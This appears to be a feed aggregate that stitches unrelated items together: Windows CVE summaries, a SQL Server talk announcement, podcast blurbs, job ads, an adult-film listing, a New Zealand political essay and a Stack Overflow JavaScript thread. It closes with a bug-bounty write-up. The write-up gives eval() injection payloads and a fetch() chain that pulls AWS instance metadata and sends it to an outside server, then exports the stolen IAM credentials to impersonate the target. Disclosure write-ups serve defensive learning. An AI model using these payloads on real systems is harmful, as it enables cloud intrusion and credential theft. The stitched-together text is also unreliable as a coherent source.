              Microsoft Device Guard Code Integrity Policy Security Feature Bypass (CVE-2018-8492)
    A security bypass vulnerability exists in Microsoft Device Guard. Successful exploitation of this vulnerability would allow remote attackers to bypass security tests and protocols on the affected system.
              Microsoft Windows Theme API Remote Code Execution (CVE-2018-8413)
    A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.
              Hack / Protect / Predict SQL Server (Slides for SQL Saturday Orlando 801)

    Hi, I’m excited to share with you that I’ll be presenting this Saturday, October 6, 2018 at SQL Saturday Orlando, the most fun SQL Saturday event I’ve attended. It’s going to be my first time announcing this content on SQL Server 2019 (currently CTP 2) and SSMS 18 Preview 4. Plus, maybe playing SQL Family Feud.

    I tend to pack a lot of content into my presentations so the audience can take the most home. I am sharing my slides here, prior to the presentation, so we can cover all the demos at the session and have ample time for Q&A.

    Please join me at Room 1 (to be announced) at Seminole State College (Sanford/Lake Mary Campus), building UP, at 11 am for SQL Saturday Orlando 801.

    Slides

    Title: Hack / Protect / Predict SQL Server. Come learn them.

    Speaker: Fleitas, Hiram

    Duration: 60 minutes

    Track: Application & Database Development

    Level: Advanced

    https://sqlsaturday.com/801/Sessions/Details.aspx?sid=83672

    Abstract:

    In this session, I’ll show you how to hack SQL Server using a simple C# console application and other tools. Most importantly, I’ll show you how to protect vectors that perhaps you’re trying to use to safeguard sensitive data for GDPR compliance.

    Tabular Data Stream (TDS) Protocol
    Dynamic Data Masking
    Row Level Security (Yep…)
    Database Source Control

    Perhaps, you’ve seen these exploits before but do you really know how to reproduce them? Or, how to even protect yourself against them? No worries, I’ll show you the way along with a load test.

    Finally, I am very excited to share with you how to analyze text using pre-trained Machine Learning models to predict a sentiment, on-prem with SQL Server 2017.

    SQL ML / AI: A deep dive to predict the sentiment

    Looking forward to meeting you all.

    Bio:

    Hiram Fleitas is the Principal Database Architect at Universal Property and Casualty Insurance Company and leads the company’s intelligent edge using Microsoft’s data platform. He currently is developing database applications using Machine Learning models trained on claims, policy, and social-media data to predict business opportunities for customer satisfaction and loyalty in real-time.

    He has worked with SQL Server for 20 years, from version 6.0 to 2019 with some of the largest companies in the world. He’s spoken on SQL Server at User Groups, South Florida Code Camp, PASS SQL Saturdays and corporate business events, often presenting talks on security, performance, devops, machine learning, and business intelligence. He coded his first program in BASIC when he was 13 years old as a school project and developed a passion in computers ever since.

    Hiram is also a code contributor to several opensource projects and serves as an IS Flotilla Staff Officer for the United States Coast Guard Auxiliary. On his time off he mostly enjoys spending time with his wife Christina and two kids, Ocean and Skylar Fleitas. He also wakeboards, wakesurfs, snowboards and does endurance training events by GORUCK’s Cadre-led decorated combat veterans of Special Operations.

    https://linkedin.com/in/hiramfleitas/

    https://fleitasarts.com

    Date & Time:

    Saturday Oct 6, 2018

    11:00 am - 12:00 pm Presentation

    Location:

    Seminole State College

    Sanford/Lake Mary Campus

    100 Weldon Blvd Building UP, Sanford, Florida, 32773

    Room #: R1 (TBA)

    Follow #SQLSatOrlando on Twitter

    Follow @HiramFleitas on Twitter


              Episode 317: Some Fishy Chips | TechSNAP 317

    Intel's patched a remote execution exploit that’s been lurking in their chips for the past nine years, we’ve got the details & some handy tips to check if you’re affected. Then Dan does a deep dive into friend of the show Tarsnap: what it is, how to use it & why it’s so awesome. Plus we discuss when we use external services versus building ourselves & a few tips for lightweight backup solutions that might work for you.

    Then your fantastic feedback, a riotous roundup & so much more!

              Episode 305: Gambling with Code | TechSNAP 305

    We’ve got the latest on GitLab's data disaster, a clever new method to cheat at the slots & a new Netgear exploit that's coming for your network!

    Plus your feedback, a giant roundup & much, much more!

              Episode 296: Schoolhouse Exploits | TechSNAP 296

    Project Zero breaks the chain, we share stories from our mischievous past & malware as a service gets busted.

    Plus your great questions, a packed round up & much, much more!

              Episode 274: Windows Exploit Edition | TechSNAP 274
    On this week's episode we cover a UEFI firmware bug that is affecting computers including ThinkPads, tell you how your Windows box can be totally pwned even if it's fully encrypted & talk about the shortcomings of the MD5 checksum. Plus the feedback, the roundup & more!
              Episode 269: 10,000 Cables Under the Sea | TechSNAP 269

    Windows exploits for sale at a great price, how the Internet works, yes, seriously & it's awesome!

    Plus we solve some of your problems, a great roundup & more!

              Episode 268: PIS Poor DNS | TechSNAP 268

    Is the “Dark Cloud” hype, or a real technology? Using DNS tunneling for remote command and control & the big problem with 1-Day exploits.

    Plus your great question, our answers, a breaking news roundup & more!

              Episode 266: Curl Sleeper Agent | TechSNAP 266

    Zero-day exploits striking over 100 systems, if you think copying links to bash scripts from the internet is okay, maybe you shouldn't be root & the day Google automated itself off the internet.

    Plus your questions, our answers, a huge round up & more!

              Episode 258: Metaphorically Exploited | TechSNAP 258

    The theoretical Android flaw becomes reality, a simple phishing scam hits some major companies & why your PIN has already been leaked.

    Plus great questions, our answers, a rocking round up & much, much more!

              Episode 252: Hot Norse Potato | TechSNAP 252

    A new OpenSSL exploit, cyber security firm Norse implodes & the Windows Hot Potato flaw that’s been around for over a decade.

    Plus great questions, our answers, a rockin round up & much, much more!

              Episode 242: A Keyboard Walks into a Barcode | TechSNAP 242

    A research team finds various ways to attack LastPass, how to use a cocktail of current Android exploits to own a device & hacking a point of sale system using poisoned barcodes!

    Plus some great questions, our answers, a rockin roundup & much, much more!

              Episode 236: National Security Breaking Agency | TechSNAP 236

    How the NSA might be breaking Crypto, fresh zero day exploit against Flash with a twist & Keylogging before computers.

    Plus a great batch of your questions, a rocking round-up & much more!
              Episode 235: Catching the Angler | TechSNAP 235

    Debug mode exposes sensitive data, Cisco’s Talos group exposes the Angler exploit kit & how Microsoft exposed Conficker with an egg hunt.

    Plus some great feedback, a huge round up & much, much more!
              Episode 234: Key Flaw With GPL | TechSNAP 234

    D-Link publishes its private code signing keys, exploiting Windows Symbolic Links & why encryption is not sufficient protection.

    Plus some great questions, our answers, a rockin roundup & much, much more!
              Episode 226: Solving the Flash Plague | TechSNAP 226

    Adobe is making changes to Flash to mitigate 0day exploits, with help from Google. Chrysler recalls 1.4M vehicles due to a software flaw, we go inside the “Business Club” cyber crime gang.

    Plus a great batch of questions, the roundup & more!
              IT Intern – mining operations technologies - Rio Tinto - Havre-Saint-Pierre, QC
    They are found everywhere, from smartphones to aircraft and cars, and in hospitals and homes....
    From Rio Tinto - Sat, 22 Sep 2018 11:00:13 GMT - View all Havre-Saint-Pierre, QC jobs
              Episode 199: Internet of Problems | TechSNAP 199

    The internet of dangerous things is arriving but what about taking care of the devices we already have? We’ll discuss!

    Plus details on critical updates from Adobe, the surprising number of Gas Stations vulnerable to exploitation via the internet, your questions, our answers & much, much more!
              Episode 198: Dude Where's My Card? | TechSNAP 198

    Adobe has a bad week, with exploits in the wild & no patch. We’ll share the details. Had your credit card stolen? We’ll tell you how.

    Plus the harsh reality for IT departments, a great batch of questions, our answers & much much more!
              Pharmacy Technical Assistant - Part Time - Pharmaprix - Montréal, QC
    Location: 4999 Chemin Queen Mary, Arr. Cdn / Ndg, Montreal, Québec, H3W 1X4 Join a store that is locally owned and operated by...
    From Shoppers Drug Mart / Pharmaprix - Tue, 09 Oct 2018 21:32:10 GMT - View all Montréal, QC jobs
              Sappho 68
    Studio: Media Blasters
    Recommended For Rental

    From 70's Swedish adult film director Jan Anders, comes a deep, penetrating piece of artful vintage erotica! A probing examination of woman-to-woman pleasures, Sappho '68 was a groundbreaking adult film that balanced artful, tasteful filmmaking with the seductive innocence of the soft core nudie-cutie genre. Showcasing the ample charms of 70's erotic/exploitation cinema legend Uschi Digard!

    Jennifer Bradley (played by Barbara Corey AKA Janis Kelly AKA Petra Andrews, an ex-roommate of Sharon Tate who also met an early tragic demise!) is a small town girl who moves to the big city to find success as a photographer where she is swept away by San Francisco's thriving sexual revolution.

    Unsatisfied with her male relationships, she chooses to frolic with one of her sexy female models, Belinda. Together they discover and experience the unbridled passions, pleasures, and tragic pitfalls of unrestrained sexual freedom!

    Stars: Barbra Corey, Janis Kelly, Petra Andrews, Russ Meyer, Uschi Digart

              Petrol Pump Politics.
    Unaffordable?  Labour supporters should brace themselves for a National Party-driven social media campaign built around the slogan: “At $2.40 a litre, we can’t afford Jacinda.” Re-cycled though this catch-phrase may be, for Kiwis on low incomes paying far too much for gas it’s likely to have a catchy ring to it. (And anyone on the Labour team thinking about telling these folk to “go electric” should, perhaps, recall the effect on the breadless masses of the thoughtless suggestion that they should consider eating cake!)

    “AT A DOLLAR a gallon we can’t afford Rowling.” Given his latest media release (8/10/18)  “Government Pricing Kiwis Out Of Their Cars”, someone’s obviously been schooling up young Simon Bridges on the way Rob Muldoon smashed Labour in 1975.

    [Bill Rowling, for all you millennials out there, was the Labour Prime Minister of New Zealand from September 1974 until December 1975, and a gallon (4.5 litres) was the unit of measure at the petrol pump. So, yes, you’re right, the motorists of 1975 paid roughly a tenth of what we pay today to fill up our tanks! – C.T.]

    But even back when petrol was only a dollar a gallon, Kiwi motorists were hurting. Ever since the Yom Kippur War of October 1973, during which Egypt and Syria came within an ace of destroying the State of Israel, the price of oil had soared. Saudi Arabia and the other Arab oil-exporters had imposed an embargo on the USA and its allies for resupplying the Israelis with arms and ammunition. The resulting price-hikes delivered a stunning blow to the Western economy. The so-called “Oil Shocks” of 1973-79 marked the end of the Great Post-War Boom. Almost overnight, New Zealanders – along with just about everyone else in the Western World – lost confidence in the future. Even worse, they began casting about for someone to blame.

    Hence, the National Party’s propaganda blaming soaring oil prices on Bill Rowling. Of course, anybody who had been following current affairs over the previous two years knew perfectly well that National was peddling what today we would call “fake news”. But, those weren’t the people Muldoon was after. The voters he was seeking to enlist alongside National’s habitual supporters were the disoriented, frustrated and just flat-out angry working-class Kiwis who were struggling to work out what had all-of-a-sudden gone wrong with their world.

    Like the former Democratic Party supporters backing Trump in 2016, these bewildered Labour voters found it increasingly difficult to identify with “their” party. Labour was supposed to stand for “the working man” and his values, but now, following the tragic death of that quintessential working-class battler, “Big Norm” Kirk in August 1974, the party was led by a training-college lecturer. What’s more, he and his colleagues were advancing policies which seemed to have more in common with the demands of the long-haired hippies and protesters in the streets than they did with the “ordinary Kiwi joker” and his concerns. Not the least of these being the soaring price of petrol.

    Muldoon and his campaign advisers were only too aware of the culture war that was brewing in the Labour Party and they couldn’t wait to exploit it.

    Over the course of the 1960s and 70s, Labour’s membership had dwindled. The party branches were peopled predominantly by people who may have been young and radical in the 1930s and 40s but who were now very settled in their ways – and views – which tended towards the socially conservative. Many Labour stalwarts were Roman Catholics, Baptists and Salvation Army members. They bitterly resented the small but active groups of liberals and radicals who had begun drifting into Labour from 1969 onwards. They were seen as middle-class carpet-baggers without the slightest idea of what it meant to be a working-class Kiwi.

    These were the people for whom National’s election slogan, “New Zealand the way YOU want it”, was created. The people who had begun to feel neglected, misunderstood and even a little bit despised by the people at the top of the Labour Party – and their intellectual friends. Some of the more prominent of these had banded together in the group called “Citizens for Rowling”. In the ears of a great many Kiwis, that sounded a lot more like “Citizens Against Muldoon”.

    It was a huge strategic error on the part of Labour’s hifalutin supporters. Instead of turning people against the pugnacious National leader, it drew them towards him. Just as liberal America’s hatred of Trump only served to entrench his support among aggrieved Americans without college degrees or six-figure salaries, Labour’s near-obsession with Rob Muldoon proved to be one of the key factors in the growth of “Rob’s Mob”. This was the peculiar assemblage of “ordinary blokes and blokesses” for whom Muldoon felt more like a Labour leader than the thoroughly decent but doggedly uninspiring Rowling.

    Forty years on, Labour supporters should brace themselves for a National Party-driven social media campaign built around the slogan: “At $2.40 a litre, we can’t afford Jacinda.” Second-hand though it may be, it’s bound to acquire some measure of political purchase. How could it not when, for Kiwis on low incomes, $2.40 a litre for gas is just one more burden for them to bear. (And anyone on the Labour team thinking about telling these folk to “go electric” should, perhaps, recall the effect on the breadless masses of the thoughtless suggestion that they should consider eating cake!)

    National’s big problem is that Simon Bridges is not Rob Muldoon. Bridges simply does not possess Muldoon’s ability to inspire both confidence and hope, fear and dread. Nor is Jacinda Ardern even remotely like Bill Rowling. The latter always came across as the person for whom the saying “nice guys finish last” was invented. And although stardust was intermittently available to politicians back in 1975, the historical record makes it very clear that nobody ever got so much as a speck of it to Bill.

    About the only thing Bridges has got going for him is that, unlike the 1973-79 oil shocks, the steady rise in the price of petrol over the period 2018-2021 cannot be sheeted home to greedy Arab oil magnates. This time, a large measure of it is Labour’s own work.

    This essay was originally posted on The Daily Blog of Tuesday, 9 October 2018.

              Better practices in large Html5 projects? (Mainly Javascript but some Html/Css)

    The main reason why I ask this question is because I hear about a lot of outdated JS techniques that are no good any more or just outdated. Seeing threads from '08 scares me after hearing all the negativity about older JS.

    My main concerns are variables and files.

    I want to create some kind of advanced calculator for a video game, so I will have TONS of variables that need to be global. Since characters in the game have so many different 'stats', is it better to do something like this even if it means more writing, well, just a prefix before everything:

    stats.health = 50;
    stats.mana = 50;
    stats.whatever = 100;
    //or is this better:
    health = 50;
    mana = 50;
    whatever = 100;

    Next question is about the files. I will have quite a few arrays with tons of data, lots of images loaded and lots of onTouch functions for the images. Do I create separate JS files for each? First load all the data, then the images and then the functions, and at the very bottom before the /html or /body tag add the listeners? I come from Lua; although I've known html + css from before, I'm just starting out in JS so any advice is greatly appreciated.

    Another thing that I'm not sure of is, I've seen at least 3 methods of creating images, what's the difference between them?

    For example:

    var image = [];
    for (var i = 0; i < imageSrc.length; i++) {
        image[i] = new Image();
        image[i].src = "images/" + imageSrc[i] + ".png";
    }

    also:

    document.createElement("img");

    That's using javascript to create images while the user is using the page.

    Is there a better way to create images that will exist right from the beginning? For example creating this within a div:

    <img id="bgMain" src="images/background.png" style="position:absolute; top:0px; left:0px;" />

    My last question is: http://jsperf.com/cached-vs-getelementbyid/5

    The performance for cache is obviously way better, but I don't understand what obj.elems.el is at all or if I look into it. Does anyone have a link to proper explaining on how to cache variables?

    Also any extra info and tips on better coding practices is greatly appreciated. Thanks so much for reading and thanks in advance for any help!

    Problem courtesy of: Hate Names

    Solution

    I will have TONS of variables that need to be global

    Why do they need to be global? Judging by your data, you are doing some character stats calculator. I suggest you learn OOP in JavaScript and build your character models based on objects. That way, they are "instances of characters" and not globals. It would look something like:

    //build a character
    var character = new Character('XXXfoozballXXX');
    character.health = 100;
    character.mana = 100;
    character.simulateHit();
    character.setStats({
        str:120,
        agi:120,
        luk:90,
        ...
    });
    //The data never lives in the global. They are in the instances of objects.
    //You can discard them and build new ones without worry of globals or resetting

    I will have quite a few arrays with tons of data, lots of images loaded and lots of onTouch functions for the images. Do I create separate JS files for each?

    You need some dependency handling framework, and structure. I suggest you learn RequireJS and Backbone for starters. There are other frameworks out there, they just happen to be what I use at the moment.

    RequireJS will require you to split the files for modularity and reusability, but will compile them with their optimizer into one file. Backbone provides a way for you to split your data, your UI and your logic into objects as well, making it important you learn OOP first.

    Another thing that I'm not sure of is, I've seen at least 3 methods of creating images, what's the difference between them?

    There are a lot of ways of doing it:

    .innerHTML()

    I prefer the second method, since it's OOP-like which will be much easier to handle with other OOP-like code.

    The performance for cache is obviously way better, but I don't understand what obj.elems.el is at all or if I look into it. Does anyone have a link to proper explaining on how to cache variables?

    What the cached method did was to get the element from the DOM only once as well as reducing the entire test into assignments rather than binding, fetching etc. JavaScript and the DOM are "separate worlds", so to speak. Crossing code from one "land" to the other entails overhead.

    To avoid that overhead, you limit the "crossings". Since you already fetched the element once, and have reference of it now, you need not fetch it again. Instead, reuse already existing references.

    Solution courtesy of: Joseph

    Discussion

    The biggest arguments against previous JS exploits have been tons of global variables and the increased potential for collisions... the simplest way around this has historically been namespacing...

    //"this" is the global namespace, window in a browser.
    this.project = this.project || {}; //establish project namespace
    project.section = project.section || {}; // project.section
    project.section.somevar = 0;
    project.section.someMethod = function(){ ... };

    This has its upsides and downsides: the upside is you get structure and can avoid collisions... the downside is that this practice takes a lot of discipline to minimize leaky abstractions. Also, the tree search for project.section.subsection.area.method has a bit of a lookup cost.

    You can reduce leaky abstractions (accidental variable leaks) by wrapping your code files in Immediately Invoked Function Expressions (IIFE)

    (function(){
        this.project = this.project || {};
        //
    }());

    Even then, there is still a lot of work involved in maintaining such a codebase. More recently there has been a growth in module patterns for JavaScript. You will probably want to think in terms of modules, and work with those modules and the objects/classes they expose. Currently there are two popular patterns for this, which are Asynchronous Module Design (AMD) and CommonJS (CJS); there are also many different tools for building your modules into scripts that can be used client side.

    You will most likely want to use RequireJS (AMD), and look into Bower (JS Package Manager), Grunt and Yeoman .

    There are quite a few tutorials available for this, and you may want to look into a toolkit like FrozenJS , at least for structure examples.

    Following is an example of how you might structure a module for your system... said module would be for a given Character on the field that inherits from the field module's Entity... You would expose a constructor 'Character' that has a bind(field) method and a render() method... to handle its own state. You could think of this as a character controller or ViewModel (in MVC/MVVM terms).

    //character.js AMD Module
    define(['jQuery','./field'],function($,fieldModule){
        function CharacterObject() {
            ... constructor internals ...
        }

        //inherit from field.Entity
        CharacterObject.prototype = new fieldModule.Entity();

        //prototype methods
        CharacterObject.prototype.bind = function(fieldInstance) {
            ... bind the CharacterObject instance to the field ...
        }
        CharacterObject.prototype.render = function() {
            ... render UI update(s) ...
            //assuming an event loop for UI processing
        }
        ...

        //module return (placed last so the prototype assignments above run before it)
        return {
            'Character':CharacterObject
            ...
        };
    });

    Beyond all of this, you may want to even consider CoffeeScript, which reduces the chance of certain behavioral issues even further, at the cost of a middle-man language/compilation step that you may not find worthwhile.

    Discussion courtesy of: Tracker1

    There is really no good argument for having many global variables. Make a single global container, and stick everything inside of it.

    window.globalContainer = {};
    globalContainer.var1 = 1;
    globalContainer.var2 = 2;
    //etc

    More than likely you will realize that it is possible not to even use a globalContainer, as you can have everything run in a scoped environment where entry is dictated by events.

    Every file which houses .js must be fetched. The fetching is slow, so you should just try to do it once instead of multiple times. Combine all the script you can into one file instead of having them all over the place. That being said, you should only do that for production - when developing you should do what is most readable. Keep in mind that your production and development javascript should always be different. One which is easy to read and logically separated, and one which is easy to transfer, and minified.

    The route you take to load an image does not really matter. createImage or new Image() will both have the same results. The important thing to remember is that the actual image is not fetched until .src has been assigned. When that happens, the image is loaded. Once a browser sees a resource it caches it. So that is how the preloading magic happens. Rendering is a whole other beast. Even if you have cached an image it may take some time to render, especially if there are many of them set to render at once and they are large images.

    Discussion courtesy of: Travis J

    This recipe can be found in its original form on Stack Overflow.


              AWS takeover through SSRF in JavaScript

    Here is the story of a bug I found in a private bug bounty program on Hackerone. It took me exactly 12h30, no break, to find it, exploit it and report it. I was able to dump the AWS credentials, which let me fully compromise the company's account: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it's one of the best bugs of my hunter career, I also learnt a lot during this sprint, so let's share!

    Intro

    As I said, the program is private, so let's call the company ArticMonkey.

    For the purpose of their activity, and their web application, ArticMonkey has developed a custom macro language; let's call it Banan++. I don't know what language was initially used for the creation of Banan++, but from the webapp you can get a JavaScript version, so let's dig in!

    The original banan++.js file was minified, but still huge: 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn't read the whole sh… By searching for some keywords very specific to Banan++, I located the first function at line 3348. About 135 functions were available at that time. This was my playground.

    Spot the issue

    I started reading the code from the top, but most of the functions were about date manipulation or mathematical operations, nothing really interesting or dangerous. After a while, I finally found one called Union() that looked promising; below is the code:

    helper.prototype.Union = function() {
        for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22];
        var value = args.shift(),
            symbol = args.shift(),
            results = args.filter(function(arg) {
                try {
                    return eval(value + symbol + arg)
                } catch (e) {
                    return !1
                }
            });
        return !!results.length
    }

    Did you notice that? Did you notice that kinky eval()? Looks soooo interesting! I copied the code into a local HTML file in order to perform more tests.

    Basically the function can take from 0 to infinitely many arguments but starts to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second, then the fourth is tested, the fifth, etc. Normal usage should be something like Union(1,'<',3); the returned value is true if at least one of these tests is true, false otherwise.

    However, there is absolutely no sanitization performed, nor any test regarding the type and the value of the arguments. With the help of my favourite debugger, alert(), I understood that an exploit could be triggered in many different ways:

    Union( 'alert()//', '2', '3' );
    Union( '1', '2;alert();', '3' );
    Union( '1', '2', '3;alert()' );
    ...

    Find an injection point

    OK, so I had a vulnerable function, which is always good, but what I needed was an input to inject some malicious code into. I remembered that I had already seen some POST parameters using Banan++ functions, so I performed a quick search in my Burp Suite history. Got it:

    POST /REDACTED HTTP/1.1
    Host: api.REDACTED.com
    Connection: close
    Content-Length: 232
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (X11; linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red
    Content-Type: application/json;charset=UTF-8
    Referer: https://app.REDACTED.com/REDACTED
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: auth=REDACTED

    {...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

    Response:

    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    Content-Length: 54
    Connection: close
    X-Content-Type-Options: nosniff
    X-Xss-Protection: 1
    Strict-Transport-Security: max-age=15768000; includeSubDomains
    ...REDACTED...

    [{"name":"REDACTED",...REDACTED...}]

    The operation parameter seemed to be a good option. Time for testing!

    Perform the injection

    Since I didn't know anything about Banan++, I had to perform some tests to find out what kind of code I could inject or not. A sort of manual fuzzing.

    {...REDACTED...,"operation":"'\"><"}
    {"status":400,"message":"Parse error on line 1...REDACTED..."}

    {...REDACTED...,"operation":null}
    []

    {...REDACTED...,"operation":"0"}
    []

    {...REDACTED...,"operation":"1"}
    [{"name":"REDACTED",...REDACTED...}]

    {...REDACTED...,"operation":"a"}
    {"status":400,"message":"Parse error on line 1...REDACTED..."}

    {...REDACTED...,"operation":"a=1"}
    {"status":400,"message":"Parse error on line 1...REDACTED..."}

    {...REDACTED...,"operation":"alert"}
    {"status":400,"message":"Parse error on line 1...REDACTED..."}

    {...REDACTED...,"operation":"alert()"}
    {"status":400,"message":"Function 'alert' is not defined"}

    {...REDACTED...,"operation":"Union()"}
    []

    What I concluded here was:

    operation

    Let’s continue with Union() :

    {...REDACTED...,"operation":"Union(1,2,3)"}
    {"status":400,"message":"Parse error on line 1...REDACTED..."}

    {...REDACTED...,"operation":"Union(a,b,c)"}
    {"status":400,"message":"Parse error on line 1...REDACTED..."}

    {...REDACTED...,"operation":"Union('a','b','c')"}
    {"status":400,"message":"Parse error on line 1...REDACTED..."}

    {...REDACTED...,"operation":"Union('a';'b';'c')"}
    [{"name":"REDACTED",...REDACTED...}]

    {...REDACTED...,"operation":"Union('1';'2';'3')"}
    [{"name":"REDACTED",...REDACTED...}]

    {...REDACTED...,"operation":"Union('1';'<';'3')"}
    [{"name":"REDACTED",...REDACTED...}]

    {...REDACTED...,"operation":"Union('1';'>';'3')"}
    []

    Perfect! If 1 < 3 the response contains valid data (true), but if 1 > 3 the response is empty (false). Parameters must be separated by a semicolon. I could now try a real attack.
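    The root cause is the eval() inside Union(), and the fuzzing above shows exactly which inputs reach it. Below, as an added example that is not ArticMonkey's code, is the same comparison written with an operator table instead of eval(): unionUnsafe() reproduces the shape found in the minified file, unionSafe() is the rewrite, and demonstrate() feeds one of the payloads from the sections above through both. recordSideEffect() is a stand-in for the fetch() the injection would otherwise perform, so the example runs offline.

```javascript
// Added example, not ArticMonkey's code: the Union() comparison from the
// article, first as the eval() shape the article found, then rewritten
// with an operator table so that arguments are data, never code.
// Banan++ is the article's placeholder name for the real macro language.

// Records any side effect that injected code manages to run. In the
// article the side effect was fetch() against 169.254.169.254; here a
// counter stands in for it so the example runs offline.
const sideEffects = [];
function recordSideEffect() {
  sideEffects.push('injected code ran');
}

// The vulnerable shape: value, symbol and each arg are concatenated and
// handed to eval(). Any of the three strings can carry JavaScript.
function unionUnsafe(value, symbol, ...args) {
  const results = args.filter((arg) => {
    try {
      return eval(value + symbol + arg);
    } catch (e) {
      return false; // errors are swallowed, so probing is silent
    }
  });
  return !!results.length;
}

// The hardened shape: the operator is looked up in a fixed table and
// operands are parsed as numbers. Anything else is rejected loudly,
// matching the API's existing 400 "Parse error" behaviour instead of
// silently returning false.
const OPERATORS = Object.freeze({
  '<':  (a, b) => a < b,
  '<=': (a, b) => a <= b,
  '>':  (a, b) => a > b,
  '>=': (a, b) => a >= b,
  '==': (a, b) => a === b,
  '!=': (a, b) => a !== b,
});

function toNumber(operand) {
  const text = String(operand).trim();
  const n = Number(text);
  if (text === '' || !Number.isFinite(n)) {
    throw new TypeError(`Union: non-numeric operand ${JSON.stringify(operand)}`);
  }
  return n;
}

function unionSafe(value, symbol, ...args) {
  const op = Object.prototype.hasOwnProperty.call(OPERATORS, symbol)
    ? OPERATORS[symbol]
    : undefined;
  if (!op) {
    throw new Error(`Union: unsupported operator ${JSON.stringify(symbol)}`);
  }
  const left = toNumber(value);
  // Same contract as the original: true if at least one comparison holds.
  return args.some((arg) => op(left, toNumber(arg)));
}

// Runs one "symbol" payload through both versions with the article's
// operands ('1' and '3') and reports whether injected code executed.
function demonstrate(payload) {
  const before = sideEffects.length;
  unionUnsafe('1', payload, '3');
  const ranUnderEval = sideEffects.length > before;
  let safeOutcome;
  try {
    safeOutcome = String(unionSafe('1', payload, '3'));
  } catch (e) {
    safeOutcome = 'rejected';
  }
  return { ranUnderEval, safeOutcome };
}
```

    With the legitimate operator '<' both versions return true; with the article's '2;alert();' style payload (here '2;recordSideEffect();') the eval() version runs the injected statement and still returns true, while the table version throws before touching it.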

    fetch is the new XMLHttpRequest

    Because the request is an AJAX call to the API that only returns JSON data, it's obviously not a client-side injection. I also knew from a previous report that ArticMonkey tends to use a lot of JavaScript server side.

    But it didn't matter, I had to try everything; maybe I could trigger an error that would reveal information about the system the JavaScript runs on. From my local testing, I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript, but all I got was the error previously mentioned.

    I then tried to fire an HTTP request.

    Through an AJAX call first:

    x = new XMLHttpRequest;
    x.open( 'GET','https://poc.myserver.com' );
    x.send();

    But I didn't receive anything. I tried HTML injection:

    i = document.createElement( 'img' );
    i.src = '<img src="https://poc.myserver.com/xxx.png">';
    document.body.appendChild( i );

    But I didn't receive anything! More tries:

    document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">';
    document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

    But I didn't receive anything!!!

    Sometimes, you know, you have to test stupid things yourself to understand how stupid they were… Obviously it was a mistake to try to render HTML code, but hey! I'm just a hacker… Back to the AJAX request, I stayed stuck there for a while. It took me quite a long time to figure out how to make it work.

    I finally remembered that ArticMonkey uses ReactJS on their frontend; I would later learn that they use NodeJS server side. Anyway, I checked on Google how to perform an AJAX request with it and found the solution in the official documentation, which led me to the fetch() function, the new standard for performing AJAX calls. That was the key.

    I injected the following:

    fetch('https://poc.myserver.com')

    And I immediately got a new line in my Apache log.

    Being able to ping my server is one thing, but it's a blind SSRF: I had no response echoed back. I had the idea of chaining two requests, where the second would send the result of the first one. Something like:

    x1 = new XMLHttpRequest;
    x1.open( 'GET','https://...', false );
    x1.send();
    r = x1.responseText;
    x2 = new XMLHttpRequest;
    x2.open( 'GET','https://poc.myserver.com/?r='+r, false );
    x2.send();

    Again it took me a while to get the correct syntax with fetch(). Thanks, StackOverflow.

    I ended up with the following code, which works pretty well:

    fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

    Of course, the same-origin policy applies in a browser; a server-side fetch(), which this turned out to be, is not bound by it.

    SSRF for the win

    I first tried to read local files:

    fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

    But the response (the r parameter) in my Apache log file was empty.

    Since I had found some S3 buckets related to ArticMonkey (articmonkey-xxx), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses: x-cache: Hit from cloudfront). I quickly jumped to the list of the most common SSRF URLs for cloud instances.

    And got a nice hit when I tried to access the metadata of the instance.

    Final payload:

    {...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

    Decoded, the output is the directory listing returned:

    ami-id
    ami-launch-index
    ami-manifest-path
    block-device-mapping/
    hostname
    iam/
    ...

    Since I didn't know anything about AWS metadata, because it was my first time in da place, I took time to explore the directories and all the files at my disposal. As you will read everywhere, the most interesting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>, which returned:

    {
      "Code":"Success",
      "Type":"AWS-HMAC",
      "AccessKeyId":"...REDACTED...",
      "SecretAccessKey":"...REDACTED...",
      "Token":"...REDACTED...",
      "Expiration":"2018-09-06T19:24:38Z",
      "LastUpdated":"2018-09-06T19:09:38Z"
    }

    Exploit the credentials

    At that time I thought the game was over. But for my PoC I wanted to show the criticality of this leak; I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that they are temporary credentials, only valid for a short period, 5 minutes more or less (the JSON above actually shows a fifteen-minute window between LastUpdated and Expiration). Anyway, that is supposed to be enough to swap my own credentials for those ones: two copy/pastes, I think I can handle that… err…

    I asked for help on Twitter from SSRF and AWS masters. Thanks guys, I truly appreciate your commitment, but I finally found the solution in the AWS Identity and Access Management User Guide. My mistake, apart from not reading the documentation (…), was to only use AccessKeyId and SecretAccessKey; that doesn't work with temporary credentials, the session token must also be exported. Kiddies…

    $ export AWS_ACCESS_KEY_ID=AKIAI44...
    $ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI...
    $ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

    Checking my identity with the following command proved that I was not myself anymore.

    aws sts get-caller-identity

    And then…


    [screenshot]

